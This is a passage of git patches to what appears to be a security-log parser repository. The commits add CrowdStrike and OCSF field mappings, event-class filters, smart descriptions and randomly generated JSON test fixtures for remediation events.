\"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "dataset": "eventlog", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "info", + "start" + ] + }, + "@timestamp": "2024-11-05T11:10:19.543000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "NTLM", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "KeyLength": "128", + "LmPackageName": "NTLM V2", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "NtLmSsp", + "LogonType": "3", + "ProcessId": "0x0", + "SubjectLogonId": "0x0", + "SubjectUserSid": "S-1-0-0", + "TargetDomainName": "EXAMPLE", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0x6accabcc3", + "TargetUserName": "johndoe", + "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111", + "VirtualAccount": "%%1843", + "WorkstationName": "WORKSTATION_NAME" + } + }, + "agent": { + "id": "555555555-9999-9999-9999-3e333333cccc", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [] + }, + "host": { + "domain": "EXAMPLE", + "hostname": "EXAMPLE", + "name": "EXAMPLE", + "os": { + "full": "Windows Server 2022 Datacenter", + "version": "10.0.20348" + } + }, + "log": { + "hostname": "EXAMPLE" + }, + "organization": { + "id": "11111111111111111111" + }, + "related": { + "hosts": [ + "EXAMPLE" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "NtLmSsp" + } + }, + "client": { + "name": "WORKSTATION_NAME", + "os": { + "type": "windows" + } + }, + "server": { + "name": "EXAMPLE", + "os": { + "type": "windows" + } + } + }, + "server": { + "domain": "EXAMPLE" + }, + "user": { + "id": "S-1-0-0", + "target": { + "domain": "EXAMPLE", + "id": "S-1-5-21-11111111111-111111111111-11111111-111", + "name": "johndoe" + } + } + } +} \ No newline at end of file From eb0b0cc5c8a73329d021db69174c4f92ac35bfaa Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 11 Nov 2024 11:14:06 +0200 Subject: [PATCH 015/150] CrowdStrike Telemetry - parse ContextBaseFileName --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 +++++ CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 3 +++ .../crowdstrike-telemetry/tests/telemetry_event_26.json | 1 + 3 files changed, 9 insertions(+) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index a59b68006..75e1b7434 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,3 +1,8 @@ +crowdstrike.base_filename: + description: Base Filename + name: crowdstrike.base_filename + type: keyword + crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index f5da81755..03e9819e7 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,6 +53,9 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" + - set: + crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" + set_registry_fields: actions: - set: diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 82baec896..1e7368eee 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,6 +18,7 @@ "id": "111111111111111" }, "crowdstrike": { + "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { From 87b46503f68a575197d5242d7cb6a073ab84d871 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 11 Nov 2024 14:29:06 +0200 Subject: [PATCH 016/150] Parse new coordinates fields --- OCSF/ocsf/ingest/parser.yml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 765a6a76d..67859cf11 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml @@ -454,8 +454,8 @@ stages: host.geo.city_name: "{{ parse_event.message.device.location.city }}" host.geo.continent_name: "{{ parse_event.message.device.location.continent }}" host.geo.country_iso_code: "{{ parse_event.message.device.location.country }}" - host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] }}" - host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] }}" + host.geo.location.lon: "{{ parse_event.message.device.location.coordinates[0] or parse_event.message.device.location.long }}" + host.geo.location.lat: "{{ parse_event.message.device.location.coordinates[1] or parse_event.message.device.location.lat }}" host.geo.name: "{{ parse_event.message.device.location.desc }}" host.geo.postal_code: "{{ parse_event.message.device.location.postal_code }}" host.geo.region_iso_code: "{{ parse_event.message.device.location.region }}" @@ -534,7 +534,8 @@ stages: - set: source.geo.city_name: "{{ parse_event.message.src_endpoint.location.city }}" source.geo.continent_name: "{{ parse_event.message.src_endpoint.location.continent }}" - source.geo.location: "{{ parse_event.message.src_endpoint.location.coordinates }}" + source.geo.location.lon: "{{ parse_event.message.src_endpoint.location.coordinates[0] or parse_event.message.src_endpoint.location.long }}" + source.geo.location.lat: "{{ parse_event.message.src_endpoint.location.coordinates[1] or parse_event.message.src_endpoint.location.lat }}" source.geo.country_iso_code: "{{ parse_event.message.src_endpoint.location.country }}" source.geo.name: "{{ parse_event.message.src_endpoint.location.desc }}" source.geo.postal_code: "{{ parse_event.message.src_endpoint.location.postal_code }}" @@ -557,8 +558,8 @@ stages: - set: destination.geo.city_name: "{{ parse_event.message.dst_endpoint.location.city }}" destination.geo.continent_name: "{{ parse_event.message.dst_endpoint.location.continent }}" - destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] }}" - destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] }}" + destination.geo.location.lon: "{{ parse_event.message.dst_endpoint.location.coordinates[0] or parse_event.message.dst_endpoint.location.long }}" + destination.geo.location.lat: "{{ parse_event.message.dst_endpoint.location.coordinates[1] or parse_event.message.dst_endpoint.location.lat }}" destination.geo.country_iso_code: "{{ parse_event.message.dst_endpoint.location.country }}" destination.geo.name: "{{ parse_event.message.dst_endpoint.location.desc }}" destination.geo.postal_code: "{{ parse_event.message.dst_endpoint.location.postal_code }}" From ee80c51721c0d1599f979a7939ad9f931d31934a Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 11 Nov 2024 15:25:34 +0200 Subject: [PATCH 017/150] Support new event types --- OCSF/ocsf/ingest/parser.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 67859cf11..b76dd0a34 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml @@ -79,16 +79,16 @@ pipeline: - name: set_common_fields - name: pipeline_object_actor - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5003,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6003,6004,6005,6006,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002,99937002] and parse_event.message.get('actor') != None }}" - name: pipeline_object_attack - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1009,1010,2001,2004,2005,2006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,6001,6005,201001,201002,201003,99901006,99902003,99904001,99904002,99904009,99904010] and parse_event.message.get('attacks') != None }}" - name: pipeline_object_network_connection_info - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,5012,6006,7004,99904009,99904010,99931006,99932007,99933005] and parse_event.message.get('connection_info') != None }}" - name: pipeline_object_device - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,6001,6002,6004,6007,201001,201002,201003,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,2002,2003,2004,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,4013,4014,5001,5002,5004,5006,5007,5008,5009,5010,5011,5012,5013,5014,5015,5016,5017,5018,5019,5020,6001,6002,6004,6007,201001,201002,201003,201004,205004,205005,205019,99901006,99903001,99904001,99904002,99904009,99904010,99936001,99936002] and parse_event.message.get('device') != None }}" - name: pipeline_object_http_request filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3004,3005,3006,4002,6001,6003,6004,6005,99937002,99938001] and parse_event.message.get('http_request') != None }}" @@ -100,7 +100,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1008,2006,3001,3002,3003,3004,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4013,4014,6001,6003,6004,6005,6006,99904009,99904010,99937002,99938001] and parse_event.message.get('dst_endpoint') != None or parse_event.message.get('src_endpoint') != None }}" - name: pipeline_object_process - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1004,1007,2001,5011,5012,5015,7003,99932006,99932007,99932011,99933006,99934001,99935002] and parse_event.message.get('process') != None }}" - name: pipeline_object_proxy filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3006,4001,4002,4003,4004,4005,4006,4007,4008,4010,4013,4014,6004,99904009,99904010] and parse_event.message.get('proxy') != None }}" @@ -115,7 +115,7 @@ pipeline: filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [3001,3002,3003,3005,3006,4014,5003,5018,99932017] and parse_event.message.get('user') != None }}" - name: pipeline_object_file - filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" + filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1001,1008,2006,4002,4005,4006,4007,4008,4010,4011,5007,6006,7002,99901006,99903001,99904001,99931004,99931007,99931010,99932001,99933000] and parse_event.message.get('file') != None }}" - name: pipeline_object_system_activity_helper filter: "{{ parse_event.message.get('class_uid') != None and parse_event.message.class_uid in [1002,1005,1006,1007,5010,5011,99932004,99932006,99933002,99933004] }}" From 8bea0aff54a582569ef9a0031f3332f82b71ece9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 12 Nov 2024 10:22:34 +0200 Subject: [PATCH 018/150] Tests and smart descriptions --- OCSF/ocsf/_meta/smart-descriptions.json | 44 +++++++++ ...generated_file_remediation_activity_1.json | 39 ++++++++ ...generated_file_remediation_activity_2.json | 39 ++++++++ ...generated_file_remediation_activity_3.json | 43 ++++++++ ...erated_network_remediation_activity_1.json | 29 ++++++ ...erated_network_remediation_activity_2.json | 30 ++++++ ...erated_process_remediation_activity_1.json | 78 +++++++++++++++ ...erated_process_remediation_activity_2.json | 69 +++++++++++++ .../tests/generated_windows_service_1.json | 97 +++++++++++++++++++ 9 files changed, 468 insertions(+) create mode 100644 OCSF/ocsf/tests/generated_file_remediation_activity_1.json create mode 100644 OCSF/ocsf/tests/generated_file_remediation_activity_2.json create mode 100644 OCSF/ocsf/tests/generated_file_remediation_activity_3.json create mode 100644 OCSF/ocsf/tests/generated_network_remediation_activity_1.json create mode 100644 OCSF/ocsf/tests/generated_network_remediation_activity_2.json create mode 100644 OCSF/ocsf/tests/generated_process_remediation_activity_1.json create mode 100644 OCSF/ocsf/tests/generated_process_remediation_activity_2.json create mode 100644 OCSF/ocsf/tests/generated_windows_service_1.json diff --git a/OCSF/ocsf/_meta/smart-descriptions.json b/OCSF/ocsf/_meta/smart-descriptions.json index d03bc41fb..6947b5762 100644 --- a/OCSF/ocsf/_meta/smart-descriptions.json +++ b/OCSF/ocsf/_meta/smart-descriptions.json @@ -928,5 +928,49 @@ "field": "ocsf.activity_name" } ] + }, + { + "value": "File Remediation Activity: {ocsf.activity_name} file {file.name}", + "conditions": [ + { + "field": "ocsf.class_uid", + "value": 7002 + }, + { + "field": "ocsf.activity_name" + }, + { + "field": "file.name" + } + ] + }, + { + "value": "Process Remediation Activity: {ocsf.activity_name} file {file.name} by process {process.name}", + "conditions": [ + { + "field": "ocsf.class_uid", + "value": 7003 + }, + { + "field": "ocsf.activity_name" + }, + { + "field": "file.name" + }, + { + "field": "process.name" + } + ] + }, + { + "value": "{ocsf.class_name}: {ocsf.activity_name}", + "conditions": [ + { + "field": "ocsf.class_name" + }, + { + "field": "ocsf.activity_name" + } + ] } ] diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_1.json b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json new file mode 100644 index 000000000..29fe10f1c --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_1.json @@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": \"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": \"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": \"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}" + }, + "expected": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": \"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": \"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": \"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}", + "event": { + "action": "evict", + "category": [], + "code": "ethnic", + "duration": 559843632000000, + "provider": "consolidated month mil", + "severity": 99, + "type": [] + }, + "@timestamp": "2024-11-11T12:36:34.225000Z", + "file": { + "directory": "canyon upgrading wool/marco.fla", + "hash": { + "ssdeep": "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + }, + "mime_type": "pr/anything", + "name": "html.pkg", + "path": "canyon upgrading wool/marco.fla/html.pkg", + "type": "Local Socket" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_2.json b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json new file mode 100644 index 000000000..9af77e1ab --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json @@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": 